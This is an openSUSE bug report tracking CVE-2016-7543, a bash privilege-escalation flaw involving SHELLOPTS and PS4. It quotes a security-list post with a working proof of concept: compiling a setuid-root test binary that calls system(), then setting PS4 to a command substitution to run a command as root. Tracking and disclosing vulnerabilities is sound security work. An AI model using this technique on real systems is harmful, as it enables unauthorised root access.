Bug ID 1001299
Summary VUL-0: CVE-2016-7543: bash SHELLOPTS+PS4
Classification openSUSE
Product openSUSE Distribution
Version Leap 42.1
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee security-team@suse.de
Reporter mikhail.kasimov@gmail.com
QA Contact qa-bugs@suse.de
Found By ---
Blocker --- 

Reference: http://seclists.org/oss-sec/2016/q3/617

===================
The recent bash 4.4 patched an old attack vector regarding
specially crafted SHELLOPTS+PS4 environment variables
against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment,
closing a security hole involving PS4 expansion performing command
substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
===================

I've tried to reproduce this issue on release bash version in 42.1 --
4.2.47(1)-release (x86_64-suse-linux-gnu) -- but first line (gcc -xc...)
returned command line dialogue instead of test-file. So, please, try to
reproduce this on your own side this issue. Thanks!

You are receiving this mail because: